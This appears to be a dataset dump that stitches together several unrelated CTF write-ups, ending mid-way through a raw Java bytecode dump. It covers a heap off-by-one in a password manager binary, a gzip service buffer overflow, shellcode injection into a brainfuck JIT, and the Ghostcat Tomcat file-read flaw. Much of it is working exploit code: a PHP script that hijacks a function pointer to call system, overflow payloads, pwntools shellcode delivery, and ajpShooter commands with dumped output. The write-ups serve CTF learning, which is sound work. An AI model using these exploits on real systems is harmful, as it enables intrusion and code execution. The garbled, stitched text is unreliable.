text_chunk
stringlengths 151
703k
|
---|
# Password Keeper - Aero CTF 2020 (pwn, 423, 23 solved)## Introduction
Password Keeper is a pwn task.
An archive containing a binary, a libc and its corresponding loader (`ld.so`).
The binary simulates a password manager in which the user can create, delete andview passwords. It is only possible to view passwords whose owner match thecurrent user.
## Reverse engineering
The binary uses two global variables : the user name, stored in an array of 64chars, and a function pointer that get used to display the user's name. Itssignature is: `void printer(char *user)`.
```cchar username[0x40];void (*printer)(char *user);```
The passwords are held in a `char[0x30]`. They are stored in an array of 16pointers on the stack. This array is followed by an array of 16 characterscalled `secret`.
```c// irrelevant [...]char *passwords[0x10];char secret[0x10];long canary;```
The program keeps track on the number of passwords. It will always allocate thepassword to last index. It also verifies that the index is in bound.
```cif(count < 0x10) passwords[count++] = malloc(0x30);```
The program accepts an index that is between 0 and `count` (inclusive) whenreading a password.
```cif(0 <= idx && idx <= count) if(password[idx] != NULL) password_show(password[idx]);```
The program accepts any integer strictly inferior to `count` when deleting apassword.
```cif(idx <= count) { free(password[idx]); password[idx] = NULL;}```
Although this construction is vulnerable (`idx` being a signed integer), thisvulnerability has not been exploited. Deleting password at index -1 deletes thelast password added to the manager.
```{?} Enter password: foobar-------- Password Keeper --------[...]4. Delete password[...]> 4{?} Enter password id: 0[...]> 4{?} Enter password id: -1free(): double free detected in tcache 2```
## Exploitation
The vulnerability lies in an off-by-one in both the read and delete features: itis possible to read and delete one element after the `password` array. This endsup in the `secret` array that can be controlled by the attacker.
The exploitation can be done by following these steps:1. put a fake heap chunk in the user name2. put a fake pointer to `.got.plt` in the `secret` array3. fill the `password` array4. read entry 16 to leak `.got.plt` content5. change secret to point to global user name6. free fake chunk by deleting entry 16 that points to it7. allocate a password in `.bss` that overwrites the `printer` function pointer8. Look at the user's info to call `printer(username)`
The `printer` function can be replaced with `system`. This will run the usernamespecified in step 1 as a command.
**Flag**: `Aero{a9b57185b3799a0bb4c0bdd01156ae2d5eeea046513a4faf1d51e114df91679e}`
## Appendices
### pwn.php```php#!/usr/bin/phpexpectLine("-------- Password Keeper --------"); $t->expectLine("1. Keep password"); $t->expectLine("2. View password"); $t->expectLine("3. View all passwords"); $t->expectLine("4. Delete password"); $t->expectLine("5. Clear all passwords"); $t->expectLine("6. View profile"); $t->expectLine("7. Change secret"); $t->expectLine("8. Exit"); $t->expect("> ");}
function add(Tube $t, $pass){ menu($t); $t->write("1\n");
$t->expect("{?} Enter password: "); $t->write($pass);}
function view(Tube $t, $idx){ menu($t); $t->write("2\n");
$t->expect("{?} Enter password id: "); $t->write("$idx\n");
$t->expectLine("---- Password [$idx] ----"); $t->expect("Value: "); $leak = $t->readLine(); $t->expect("Owner: "); $t->readLine();
return $leak;}
function del(Tube $t, $idx){ menu($t); $t->write("4\n");
$t->expect("{?} Enter password id: "); $t->write("$idx\n");}
function clear(Tube $t){ menu($t); $t->write("5\n");}
function secret(Tube $t, $secret){ menu($t); $t->write("7\n");
$t->expect("Enter new secret: "); $t->write($secret);}
$t = new Socket("tasks.aeroctf.com", 33039);
$user = "/bin/sh\0XeR\0TFNS\0";$user = str_pad($user, 0x30, "\x00");$user .= pack("Q*", 0, 0x41);
$t->expect("{?} Enter name: ");$t->write($user);
$t->expect("{?} Enter secret: ");$t->write(pack("Q", 0x00403ff0)); // [email protected]
printf("[*] Create passwords\n");for($i = 0; $i < 0x10; $i++) add($t, $i);
$leak = view($t, 16);$leak = str_pad(substr($leak, 0, 8), 8, "\x00");$addr = unpack("Q", $leak)[1];$libc = $addr - 0x00026ad0;printf("[+] libc: %X\n", $libc);
printf("[*] Free pointer\n");secret($t, pack("Q", 0x00404100)); // pointerdel($t, 16);
printf("[*] Get shell\n");add($t, pack("Q", $libc + 0x00046ed0));menu($t);$t->write("6\n");
printf("[+] Pipe\n");$t->pipe();``` |
Before starting this one, let's see what kind of defenses are in play

Since we have no stack cookies, but nx stack, my first guess was ret2libc.
Our program takes a gzip file and gunzips it, so our exploit code must be contained in a gzipped file. Otherwise it will error.The program forks and runs gzip in a child process.
I noticed that in reading the output back from the child, gets() is being called. 
That means that if we can overflow the buffer, we get control of EIP. What can we do with that? From the gdb image, we have a hardcoded address for /bin/sh and execl(). So, if we call execl() with /bin/sh, we pop a shell.
Our exploit will look something like this: A bunch of A's | Address of execl() | Junk | Address of /bin/sh | NULL.
This comes out to the following code: ``` python -c 'print "A"*1048+ "\xb0\x90\x04\x08"*2 + "\x0e\xa0\x04\x08"*2 +"\x00"*4```we then gzip the output, feed it to the program, and.............Nothing.
What happened for me is that my code would run and then exit cleanly. The problem with that is I need an interactive shell to type 'cat flag'. The solution to this is to run (cat exploit.gz; cat) | ./gunzipasaservice
I made this writeup after the CTF, so the server was not around for me to show the flag being printed :(However, you can run this locally to verify that it works
 |
You are prompted with a Just In Time compiler written in Rust and executing brainfuck code.
A teamate found out by moving the pointer in left or "**<**" you can find a funtion which looked like this:``` sub rsp, 0x28 mov qword [rsp + 0x30], rcx mov qword [rsp + 0x40], r8 mov qword [rsp + 0x48], r9 sub rsi, 0x68 cmp rsi, rdx jae 0x38 add rsi, 0x8000 mov qword [rsp + 0x30], rdi mov qword [rsp + 0x38], rsi mov qword [rsp + 0x40], rdx mov qword [rsp + 0x48], rcx movabs rax, 0x56321e001b50 call rax mov rdi, qword [rsp + 0x30] mov rsi, qword [rsp + 0x38] mov rdx, qword [rsp + 0x40] mov rcx, qword [rsp + 0x48] cmp al, 0 jne 0x80 mov rax, 0 add rsp, 0x28 ret mov rax, 1 add rsp, 0x28 ret```
The function can be rewritten with some shellcode by reading it with "**,**" which is the equivalent of getchar() in C.I do not overwrite the call because the shellcode will not be executed.
Full Expoit:
```from pwn import *from pwnlib import shellcraft
p = remote("challenges.tamuctf.com", 31337)context.bits = 64context.arch = "amd64"
shellcode = asm(shellcraft.amd64.linux.sh())
pay = b"<"*23for _ in range(len(shellcode)): pay += b",>"
print(pay)
p.recvuntil("$")p.sendline(pay)p.sendline(shellcode)
p.interactive()
``` |
# VolgaCTF Qualifier 2020 – NetCorp
* **Category:** web* **Points:** 100
## Challenge
> Another telecom provider. Hope these guys prepared well enough for the network load...> > http://netcorp.q.2020.volgactf.ru:7782/
## Solution
After doing some recon, you can discover that the application server is an old Apache Tomcat installation. In particular, trying to reach `http://netcorp.q.2020.volgactf.ru:7782/%00` URL will spawn an error containing the version: `Apache Tomcat/9.0.24`.
This version is affected of [*Ghostcat vulnerability* (*CVE-2020-1938*)](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1938).
For this vulnerability, several public exploits exist. One of them is [*Ajp Shooter*](https://github.com/00theway/Ghostcat-CNVD-2020-10487).
You can checkout and use it to read `web.xml` file.
```root@m3ss4p0:~/Ghostcat-CNVD-2020-10487# python3 ajpShooter.py http://netcorp.q.2020.volgactf.ru:7782 8009 /WEB-INF/web.xml read
_ _ __ _ _ /_\ (_)_ __ / _\ |__ ___ ___ | |_ ___ _ __ //_\\ | | '_ \ \ \| '_ \ / _ \ / _ \| __/ _ \ '__| / _ \| | |_) | _\ \ | | | (_) | (_) | || __/ | \_/ \_// | .__/ \__/_| |_|\___/ \___/ \__\___|_| |__/|_| 00theway,just for test
[<] 200 200[<] Accept-Ranges: bytes[<] ETag: W/"1000-1585246342000"[<] Last-Modified: Thu, 26 Mar 2020 18:12:22 GMT[<] Content-Type: application/xml[<] Content-Length: 1000
<web-app> <display-name>NetCorp</display-name> <servlet> <servlet-name>ServeScreenshot</servlet-name> <display-name>ServeScreenshot</display-name> <servlet-class>ru.volgactf.netcorp.ServeScreenshotServlet</servlet-class> </servlet> <servlet-mapping> <servlet-name>ServeScreenshot</servlet-name> <url-pattern>/ServeScreenshot</url-pattern> </servlet-mapping>
<servlet> <servlet-name>ServeComplaint</servlet-name> <display-name>ServeComplaint</display-name> <description>Complaint info</description> <servlet-class>ru.volgactf.netcorp.ServeComplaintServlet</servlet-class> </servlet>
<servlet-mapping> <servlet-name>ServeComplaint</servlet-name> <url-pattern>/ServeComplaint</url-pattern> </servlet-mapping>
<error-page> <error-code>404</error-code> <location>/404.html</location> </error-page>
</web-app>```
At this point, you can discover that two servlets exist:* `ru.volgactf.netcorp.ServeScreenshotServlet` available at `http://netcorp.q.2020.volgactf.ru:7782/ServeScreenshot`;* `ru.volgactf.netcorp.ServeComplaintServlet` available at `http://netcorp.q.2020.volgactf.ru:7782/ServeComplaint`.
You can easily get both `.class` files using the exploit.
```root@m3ss4p0:~/Ghostcat-CNVD-2020-10487# python3 ajpShooter.py http://netcorp.q.2020.volgactf.ru:7782 8009 /WEB-INF/classes/ru/volgactf/netcorp/ServeScreenshotServlet.class read
_ _ __ _ _ /_\ (_)_ __ / _\ |__ ___ ___ | |_ ___ _ __ //_\\ | | '_ \ \ \| '_ \ / _ \ / _ \| __/ _ \ '__| / _ \| | |_) | _\ \ | | | (_) | (_) | || __/ | \_/ \_// | .__/ \__/_| |_|\___/ \___/ \__\___|_| |__/|_| 00theway,just for test
[<] 200 200[<] Accept-Ranges: bytes[<] ETag: W/"4926-1585246402000"[<] Last-Modified: Thu, 26 Mar 2020 18:13:22 GMT[<] Content-Type: application/java[<] Content-Length: 4926
b'\xca\xfe\xba\xbe\x00\x00\x004\x01\x1f\n\x00D\x00\x8e\t\x00\x8f\x00\x90\x08\x00\x91\n\x00\x92\x00\x93\x08\x00\x94\x08\x00\x95\x0b\x00\x96\x00\x97\x08\x00\x98\x0b\x00\x99\x00\x9a\x07\x00\x9b\n\x00\n\x00\x8e\n\x00\n\x00\x9c\x07\x00\x9d\x08\x00\x9e\n\x00\n\x00\x9f\x07\x00\xa0\n\x00\x10\x00\xa1\n\x00\x10\x00\xa2\n\x00\x10\x00\xa3\x08\x00\xa4\x0b\x00\x96\x00\xa5\x08\x00\xa6\n\x00\xa7\x00\xa8\x0b\x00\x96\x00\xa9\x0b\x00\xaa\x00\xab\x0b\x00\xac\x00\xad\x0b\x00\xac\x00\xae\x07\x00\xaf\n\x00\r\x00\xb0\n\x00\x10\x00\xb1\n\x00\r\x00\xb2\t\x00\x10\x00\xb3\x08\x00\xb4\x0b\x00\x1c\x00\xb5\x0b\x00\xb6\x00\xb7\x08\x00\xb8\x0b\x00\xb6\x00\xb9\x08\x00\xba\x0b\x00\xb6\x00\xbb\x08\x00\xbc\x07\x00\xbd\n\x00\xa7\x00\xbe\n\x00\xbf\x00\xc0\n\x00\xbf\x00\xc1\x08\x00\xc2\n\x00\xc3\x00\xc4\n\x00\xa7\x00\xc5\n\x00\xc3\x00\xc6\n\x00\xc3\x00\xc7\x07\x00\xc8\n\x002\x00\xc9\n\x002\x00\xca\n\x00\n\x00\xcb\n\x00\xa7\x00\xcc\x08\x00\xcd\x07\x00\xce\n\x008\x00\xcf\x08\x00\xd0\x0b\x00\x1c\x00\xd1\x08\x00\xd2\n\x00\xa7\x00\xd3\n\x00\xa7\x00\xd4\x08\x00\xd5\n\x00\xa7\x00\xd6\x08\x00\xd7\n\x00\xa7\x00\xd8\n\x00\xa7\x00\xd9\x07\x00\xda\x01\x00\x08SAVE_DIR\x01\x00\x12Ljava/lang/String;\x01\x00\rConstantValue\x01\x00\x06<init>\x01\x00\x03()V\x01\x00\x04Code\x01\x00\x0fLineNumberTable\x01\x00\x12LocalVariableTable\x01\x00\x04this\x01\x00,Lru/volgactf/netcorp/ServeScreenshotServlet;\x01\x00\x04init\x01\x00 (Ljavax/servlet/ServletConfig;)V\x01\x00\x06config\x01\x00\x1dLjavax/servlet/ServletConfig;\x01\x00\nExceptions\x07\x00\xdb\x01\x00\x07destroy\x01\x00\x06doPost\x01\x00R(Ljavax/servlet/http/HttpServletRequest;Ljavax/servlet/http/HttpServletResponse;)V\x01\x00\x08fileName\x01\x00\x0ehashedFileName\x01\x00\x04path\x01\x00\x04part\x01\x00\x19Ljavax/servlet/http/Part;\x01\x00\x07request\x01\x00\'Ljavax/servlet/http/HttpServletRequest;\x01\x00\x08response\x01\x00(Ljavax/servlet/http/HttpServletResponse;\x01\x00\x07appPath\x01\x00\x08savePath\x01\x00\x0bfileSaveDir\x01\x00\x0eLjava/io/File;\x01\x00\x06submut\x01\x00\x03out\x01\x00\x15Ljava/io/PrintWriter;\x01\x00\rStackMapTable\x07\x00\xdc\x07\x00\xa0\x07\x00\xdd\x07\x00\x9d\x07\x00\xde\x07\x00\xdf\x07\x00\xaf\x07\x00\xe0\x01\x00\x10generateFileName\x01\x00&(Ljava/lang/String;)Ljava/lang/String;\x01\x00\x01i\x01\x00\x01I\x01\x00\x05count\x01\x00\x02md\x01\x00\x1dLjava/security/MessageDigest;\x01\x00\x06digest\x01\x00\x02[B\x01\x00\x02s2\x01\x00\x02sb\x01\x00\x19Ljava/lang/StringBuilder;\x01\x00\x01e\x01\x00(Ljava/security/NoSuchAlgorithmException;\x07\x00\xe1\x07\x00y\x07\x00\x9b\x07\x00\xce\x01\x00\x0fextractFileName\x01\x00-(Ljavax/servlet/http/Part;)Ljava/lang/String;\x01\x00\x01s\x01\x00\x0bcontentDisp\x01\x00\x05items\x01\x00\x13[Ljava/lang/String;\x07\x00\x88\x01\x00\nSourceFile\x01\x00\x1bServeScreenshotServlet.java\x01\x00\x19RuntimeVisibleAnnotations\x01\x00*Ljavax/servlet/annotation/MultipartConfig;\x0c\x00H\x00I\x07\x00\xe2\x0c\x00f\x00\xe3\x01\x00*ServeScreenshotServlet Constructor called!\x07\x00\xe4\x0c\x00\xe5\x00\xe6\x01\x00+ServeScreenshotServlet "Init" method called\x01\x00.ServeScreenshotServlet "Destroy" method called\x07\x00\xde\x0c\x00\xe7\x00\xe8\x01\x00\x00\x07\x00\xe9\x0c\x00\xea\x00r\x01\x00\x17java/lang/StringBuilder\x0c\x00\xeb\x00\xec\x01\x00*ru/volgactf/netcorp/ServeScreenshotServlet\x01\x00\x07uploads\x0c\x00\xed\x00\xee\x01\x00\x0cjava/io/File\x0c\x00H\x00\xe6\x0c\x00\xef\x00\xf0\x0c\x00\xf1\x00\xf0\x01\x00\x06submit\x0c\x00\xf2\x00r\x01\x00\x04true\x07\x00\xdc\x0c\x00\xf3\x00\xf4\x0c\x00\xf5\x00\xf6\x07\x00\xf7\x0c\x00\xf8\x00\xf9\x07\x00\xdd\x0c\x00\xfa\x00\xf0\x0c\x00\xfb\x00\xfc\x01\x00\x17javax/servlet/http/Part\x0c\x00\x83\x00\x84\x0c\x00\xfd\x00\xee\x0c\x00q\x00r\x0c\x00\xfe\x00F\x01\x00\x05Error\x0c\x00\xff\x00\xe6\x07\x00\xdf\x0c\x01\x00\x01\x01\x01\x00\x10application/json\x0c\x01\x02\x00\xe6\x01\x00\x05UTF-8\x0c\x01\x03\x00\xe6\x01\x00\x10{\'success\':\'%s\'}\x01\x00\x10java/lang/Object\x0c\x01\x04\x01\x05\x07\x01\x06\x0c\x01\x07\x00\xe6\x0c\x01\x08\x00I\x01\x00\x03MD5\x07\x00\xe1\x0c\x01\t\x01\n\x0c\x01\x0b\x01\x0c\x0c\x01\r\x01\x0e\x0c\x00x\x01\x0c\x01\x00\x14java/math/BigInteger\x0c\x00H\x01\x0f\x0c\x00\xed\x01\x10\x0c\x00H\x01\x11\x0c\x01\x12\x01\x13\x01\x00\x010\x01\x00&java/security/NoSuchAlgorithmException\x0c\x01\x14\x00I\x01\x00\x13content-disposition\x0c\x01\x15\x00r\x01\x00\x01;\x0c\x01\x16\x01\x17\x0c\x01\x18\x00\xee\x01\x00\x08filename\x0c\x01\x19\x01\x1a\x01\x00\x01=\x0c\x01\x1b\x01\x1c\x0c\x01\x1d\x01\x1e\x01\x00\x1ejavax/servlet/http/HttpServlet\x01\x00\x1ejavax/servlet/ServletException\x01\x00\x10java/lang/String\x01\x00\x12java/util/Iterator\x01\x00%javax/servlet/http/HttpServletRequest\x01\x00&javax/servlet/http/HttpServletResponse\x01\x00\x13java/io/IOException\x01\x00\x1bjava/security/MessageDigest\x01\x00\x10java/lang/System\x01\x00\x15Ljava/io/PrintStream;\x01\x00\x13java/io/PrintStream\x01\x00\x07println\x01\x00\x15(Ljava/lang/String;)V\x01\x00\x11getServletContext\x01\x00 ()Ljavax/servlet/ServletContext;\x01\x00\x1cjavax/servlet/ServletContext\x01\x00\x0bgetRealPath\x01\x00\x06append\x01\x00-(Ljava/lang/String;)Ljava/lang/StringBuilder;\x01\x00\x08toString\x01\x00\x14()Ljava/lang/String;\x01\x00\x06exists\x01\x00\x03()Z\x01\x00\x05mkdir\x01\x00\x0cgetParameter\x01\x00\x06equals\x01\x00\x15(Ljava/lang/Object;)Z\x01\x00\x08getParts\x01\x00\x18()Ljava/util/Collection;\x01\x00\x14java/util/Collection\x01\x00\x08iterator\x01\x00\x16()Ljava/util/Iterator;\x01\x00\x07hasNext\x01\x00\x04next\x01\x00\x14()Ljava/lang/Object;\x01\x00\x07getName\x01\x00\tseparator\x01\x00\x05write\x01\x00\tgetWriter\x01\x00\x17()Ljava/io/PrintWriter;\x01\x00\x0esetContentType\x01\x00\x14setCharacterEncoding\x01\x00\x06format\x01\x009(Ljava/lang/String;[Ljava/lang/Object;)Ljava/lang/String;\x01\x00\x13java/io/PrintWriter\x01\x00\x05print\x01\x00\x05flush\x01\x00\x0bgetInstance\x01\x001(Ljava/lang/String;)Ljava/security/MessageDigest;\x01\x00\x08getBytes\x01\x00\x04()[B\x01\x00\x06update\x01\x00\x05([B)V\x01\x00\x06(I[B)V\x01\x00\x15(I)Ljava/lang/String;\x01\x00\x04(I)V\x01\x00\x06length\x01\x00\x03()I\x01\x00\x0fprintStackTrace\x01\x00\tgetHeader\x01\x00\x05split\x01\x00\'(Ljava/lang/String;)[Ljava/lang/String;\x01\x00\x04trim\x01\x00\nstartsWith\x01\x00\x15(Ljava/lang/String;)Z\x01\x00\x07indexOf\x01\x00\x15(Ljava/lang/String;)I\x01\x00\tsubstring\x01\x00\x16(II)Ljava/lang/String;\x00!\x00\r\x00D\x00\x00\x00\x01\x00\x1a\x00E\x00F\x00\x01\x00G\x00\x00\x00\x02\x00\x0e\x00\x06\x00\x01\x00H\x00I\x00\x01\x00J\x00\x00\x00?\x00\x02\x00\x01\x00\x00\x00\r*\xb7\x00\x01\xb2\x00\x02\x12\x03\xb6\x00\x04\xb1\x00\x00\x00\x02\x00K\x00\x00\x00\x0e\x00\x03\x00\x00\x00\x1a\x00\x04\x00\x1b\x00\x0c\x00\x1c\x00L\x00\x00\x00\x0c\x00\x01\x00\x00\x00\r\x00M\x00N\x00\x00\x00\x01\x00O\x00P\x00\x02\x00J\x00\x00\x00A\x00\x02\x00\x02\x00\x00\x00\t\xb2\x00\x02\x12\x05\xb6\x00\x04\xb1\x00\x00\x00\x02\x00K\x00\x00\x00\n\x00\x02\x00\x00\x00\x1f\x00\x08\x00 \x00L\x00\x00\x00\x16\x00\x02\x00\x00\x00\t\x00M\x00N\x00\x00\x00\x00\x00\t\x00Q\x00R\x00\x01\x00S\x00\x00\x00\x04\x00\x01\x00T\x00\x01\x00U\x00I\x00\x01\x00J\x00\x00\x007\x00\x02\x00\x01\x00\x00\x00\t\xb2\x00\x02\x12\x06\xb6\x00\x04\xb1\x00\x00\x00\x02\x00K\x00\x00\x00\n\x00\x02\x00\x00\x00$\x00\x08\x00%\x00L\x00\x00\x00\x0c\x00\x01\x00\x00\x00\t\x00M\x00N\x00\x00\x00\x04\x00V\x00W\x00\x02\x00J\x00\x00\x02O\x00\x06\x00\x0c\x00\x00\x00\xfc+\xb9\x00\x07\x01\x00\x12\x08\xb9\x00\t\x02\x00N\xbb\x00\nY\xb7\x00\x0b-\xb6\x00\x0c\x12\x0e\xb6\x00\x0c\xb6\x00\x0f:\x04\xbb\x00\x10Y\x19\x04\xb7\x00\x11:\x05\x19\x05\xb6\x00\x12\x9a\x00\t\x19\x05\xb6\x00\x13W+\x12\x14\xb9\x00\x15\x02\x00:\x06\x19\x06\xc6\x00\r\x19\x06\x12\x16\xb6\x00\x17\x9a\x00\x03+\xb9\x00\x18\x01\x00\xb9\x00\x19\x01\x00:\x07\x19\x07\xb9\x00\x1a\x01\x00\x99\x00b\x19\x07\xb9\x00\x1b\x01\x00\xc0\x00\x1c:\x08*\x19\x08\xb7\x00\x1d:\t\xbb\x00\x10Y\x19\t\xb7\x00\x11\xb6\x00\x1e:\t*\x19\t\xb7\x00\x1f:\n\xbb\x00\nY\xb7\x00\x0b\x19\x04\xb6\x00\x0c\xb2\x00 \xb6\x00\x0c\x19\n\xb6\x00\x0c\xb6\x00\x0f:\x0b\x19\x0b\x12!\xb6\x00\x17\x99\x00\x06\xa7\xff\xa6\x19\x08\x19\x0b\xb9\x00"\x02\x00\xa7\xff\x9a,\xb9\x00#\x01\x00:\x07,\x12$\xb9\x00%\x02\x00,\x12&\xb9\x00\'\x02\x00\x19\x07\x12(\x04\xbd\x00)Y\x03\x12\x16S\xb8\x00*\xb6\x00+\x19\x07\xb6\x00,\xb1\x00\x00\x00\x03\x00K\x00\x00\x00Z\x00\x16\x00\x00\x00+\x00\x0e\x00.\x00#\x000\x00.\x001\x006\x002\x00<\x004\x00F\x005\x00U\x008\x00x\x009\x00\x80\x00;\x00\x8e\x00<\x00\x96\x00=\x00\xb2\x00>\x00\xbc\x00?\x00\xbf\x00@\x00\xc8\x00A\x00\xcb\x00C\x00\xd3\x00D\x00\xdb\x00E\x00\xe3\x00F\x00\xf6\x00G\x00\xfb\x00H\x00L\x00\x00\x00z\x00\x0c\x00\x80\x00H\x00X\x00F\x00\t\x00\x96\x002\x00Y\x00F\x00\n\x00\xb2\x00\x16\x00Z\x00F\x00\x0b\x00x\x00P\x00[\x00\\\x00\x08\x00\x00\x00\xfc\x00M\x00N\x00\x00\x00\x00\x00\xfc\x00]\x00^\x00\x01\x00\x00\x00\xfc\x00_\x00`\x00\x02\x00\x0e\x00\xee\x00a\x00F\x00\x03\x00#\x00\xd9\x00b\x00F\x00\x04\x00.\x00\xce\x00c\x00d\x00\x05\x00F\x00\xb6\x00e\x00F\x00\x06\x00\xd3\x00)\x00f\x00g\x00\x07\x00h\x00\x00\x00a\x00\x05\xfe\x00<\x07\x00i\x07\x00i\x07\x00j\xfc\x00\x18\x07\x00i\xfc\x00\x0c\x07\x00k\xff\x00\\\x00\x0c\x07\x00l\x07\x00m\x07\x00n\x07\x00i\x07\x00i\x07\x00j\x07\x00i\x07\x00k\x07\x00o\x07\x00i\x07\x00i\x07\x00i\x00\x00\xff\x00\x0b\x00\x07\x07\x00l\x07\x00m\x07\x00n\x07\x00i\x07\x00i\x07\x00j\x07\x00i\x00\x00\x00S\x00\x00\x00\x06\x00\x02\x00T\x00p\x00\x02\x00q\x00r\x00\x01\x00J\x00\x00\x01G\x00\x04\x00\x08\x00\x00\x00c\x12-\xb8\x00.M,+\xb6\x00/\xb6\x000,\xb6\x001N\xbb\x002Y\x04-\xb7\x003\x10\x10\xb6\x004:\x04\xbb\x00\nY\x10 \xb7\x005:\x05\x036\x06\x10 \x19\x04\xb6\x006d6\x07\x15\x06\x15\x07\xa2\x00\x11\x19\x05\x127\xb6\x00\x0cW\x84\x06\x01\xa7\xff\xee\x19\x05\x19\x04\xb6\x00\x0c\xb6\x00\x0f\xb0M,\xb6\x009\x12!\xb0\x00\x01\x00\x00\x00Z\x00[\x008\x00\x03\x00K\x00\x00\x002\x00\x0c\x00\x00\x00L\x00\x06\x00M\x00\x0e\x00N\x00\x13\x00O\x00#\x00P\x00.\x00R\x00B\x00S\x00J\x00R\x00P\x00V\x00[\x00X\x00\\\x00Y\x00`\x00Z\x00L\x00\x00\x00\\\x00\t\x001\x00\x1f\x00s\x00t\x00\x06\x00;\x00\x15\x00u\x00t\x00\x07\x00\x06\x00U\x00v\x00w\x00\x02\x00\x13\x00H\x00x\x00y\x00\x03\x00#\x008\x00z\x00F\x00\x04\x00.\x00-\x00{\x00|\x00\x05\x00\\\x00\x07\x00}\x00~\x00\x02\x00\x00\x00c\x00M\x00N\x00\x00\x00\x00\x00c\x00X\x00F\x00\x01\x00h\x00\x00\x000\x00\x03\xff\x00;\x00\x08\x07\x00l\x07\x00i\x07\x00\x7f\x07\x00\x80\x07\x00i\x07\x00\x81\x01\x01\x00\x00\xf9\x00\x14\xff\x00\n\x00\x02\x07\x00l\x07\x00i\x00\x01\x07\x00\x82\x00\x02\x00\x83\x00\x84\x00\x01\x00J\x00\x00\x00\xe3\x00\x04\x00\x08\x00\x00\x00U+\x12:\xb9\x00;\x02\x00M,\x12<\xb6\x00=N-:\x04\x19\x04\xbe6\x05\x036\x06\x15\x06\x15\x05\xa2\x003\x19\x04\x15\x062:\x07\x19\x07\xb6\x00>\x12?\xb6\x00@\x99\x00\x19\x19\x07\x19\x07\x12A\xb6\x00B\x05`\x19\x07\xb6\x006\x04d\xb6\x00C\xb0\x84\x06\x01\xa7\xff\xcc\x12\x08\xb0\x00\x00\x00\x03\x00K\x00\x00\x00\x1e\x00\x07\x00\x00\x00_\x00\t\x00`\x00\x10\x00a\x00)\x00b\x006\x00c\x00L\x00a\x00R\x00f\x00L\x00\x00\x004\x00\x05\x00)\x00#\x00\x85\x00F\x00\x07\x00\x00\x00U\x00M\x00N\x00\x00\x00\x00\x00U\x00[\x00\\\x00\x01\x00\t\x00L\x00\x86\x00F\x00\x02\x00\x10\x00E\x00\x87\x00\x88\x00\x03\x00h\x00\x00\x00\x1e\x00\x03\xff\x00\x1b\x00\x07\x07\x00l\x07\x00o\x07\x00i\x07\x00\x89\x07\x00\x89\x01\x01\x00\x000\xf8\x00\x05\x00\x02\x00\x8a\x00\x00\x00\x02\x00\x8b\x00\x8c\x00\x00\x00\x06\x00\x01\x00\x8d\x00\x00'
root@m3ss4p0:~/Ghostcat-CNVD-2020-10487# python3 ajpShooter.py http://netcorp.q.2020.volgactf.ru:7782 8009 /WEB-INF/classes/ru/volgactf/netcorp/ServeComplaintServlet.class read
_ _ __ _ _ /_\ (_)_ __ / _\ |__ ___ ___ | |_ ___ _ __ //_\\ | | '_ \ \ \| '_ \ / _ \ / _ \| __/ _ \ '__| / _ \| | |_) | _\ \ | | | (_) | (_) | || __/ | \_/ \_// | .__/ \__/_| |_|\___/ \___/ \__\___|_| |__/|_| 00theway,just for test
[<] 200 200[<] Accept-Ranges: bytes[<] ETag: W/"1559-1585246402000"[<] Last-Modified: Thu, 26 Mar 2020 18:13:22 GMT[<] Content-Type: application/java[<] Content-Length: 1559
b'\xca\xfe\xba\xbe\x00\x00\x004\x00>\n\x00\x08\x00+\t\x00,\x00-\x08\x00.\n\x00/\x000\x08\x001\x08\x002\x07\x003\x07\x004\x01\x00\x10serialVersionUID\x01\x00\x01J\x01\x00\rConstantValue\x05\x00\x00\x00\x00\x00\x00\x00\x01\x01\x00\x08SAVE_DIR\x01\x00\x12Ljava/lang/String;\x08\x005\x01\x00\x06<init>\x01\x00\x03()V\x01\x00\x04Code\x01\x00\x0fLineNumberTable\x01\x00\x12LocalVariableTable\x01\x00\x04this\x01\x00+Lru/volgactf/netcorp/ServeComplaintServlet;\x01\x00\x04init\x01\x00 (Ljavax/servlet/ServletConfig;)V\x01\x00\x06config\x01\x00\x1dLjavax/servlet/ServletConfig;\x01\x00\nExceptions\x07\x006\x01\x00\x07destroy\x01\x00\x05doGet\x01\x00R(Ljavax/servlet/http/HttpServletRequest;Ljavax/servlet/http/HttpServletResponse;)V\x01\x00\x07request\x01\x00\'Ljavax/servlet/http/HttpServletRequest;\x01\x00\x08response\x01\x00(Ljavax/servlet/http/HttpServletResponse;\x07\x007\x01\x00\x06doPost\x01\x00\nSourceFile\x01\x00\x1aServeComplaintServlet.java\x01\x00\x19RuntimeVisibleAnnotations\x01\x00*Ljavax/servlet/annotation/MultipartConfig;\x0c\x00\x11\x00\x12\x07\x008\x0c\x009\x00:\x01\x00*ServeScreenshotServlet Constructor called!\x07\x00;\x0c\x00<\x00=\x01\x00+ServeScreenshotServlet "Init" method called\x01\x00.ServeScreenshotServlet "Destroy" method called\x01\x00)ru/volgactf/netcorp/ServeComplaintServlet\x01\x00\x1ejavax/servlet/http/HttpServlet\x01\x00\x07uploads\x01\x00\x1ejavax/servlet/ServletException\x01\x00\x13java/io/IOException\x01\x00\x10java/lang/System\x01\x00\x03out\x01\x00\x15Ljava/io/PrintStream;\x01\x00\x13java/io/PrintStream\x01\x00\x07println\x01\x00\x15(Ljava/lang/String;)V\x00!\x00\x07\x00\x08\x00\x00\x00\x02\x00\x1a\x00\t\x00\n\x00\x01\x00\x0b\x00\x00\x00\x02\x00\x0c\x00\x1a\x00\x0e\x00\x0f\x00\x01\x00\x0b\x00\x00\x00\x02\x00\x10\x00\x05\x00\x01\x00\x11\x00\x12\x00\x01\x00\x13\x00\x00\x00?\x00\x02\x00\x01\x00\x00\x00\r*\xb7\x00\x01\xb2\x00\x02\x12\x03\xb6\x00\x04\xb1\x00\x00\x00\x02\x00\x14\x00\x00\x00\x0e\x00\x03\x00\x00\x00\x15\x00\x04\x00\x16\x00\x0c\x00\x17\x00\x15\x00\x00\x00\x0c\x00\x01\x00\x00\x00\r\x00\x16\x00\x17\x00\x00\x00\x01\x00\x18\x00\x19\x00\x02\x00\x13\x00\x00\x00A\x00\x02\x00\x02\x00\x00\x00\t\xb2\x00\x02\x12\x05\xb6\x00\x04\xb1\x00\x00\x00\x02\x00\x14\x00\x00\x00\n\x00\x02\x00\x00\x00\x1b\x00\x08\x00\x1c\x00\x15\x00\x00\x00\x16\x00\x02\x00\x00\x00\t\x00\x16\x00\x17\x00\x00\x00\x00\x00\t\x00\x1a\x00\x1b\x00\x01\x00\x1c\x00\x00\x00\x04\x00\x01\x00\x1d\x00\x01\x00\x1e\x00\x12\x00\x01\x00\x13\x00\x00\x007\x00\x02\x00\x01\x00\x00\x00\t\xb2\x00\x02\x12\x06\xb6\x00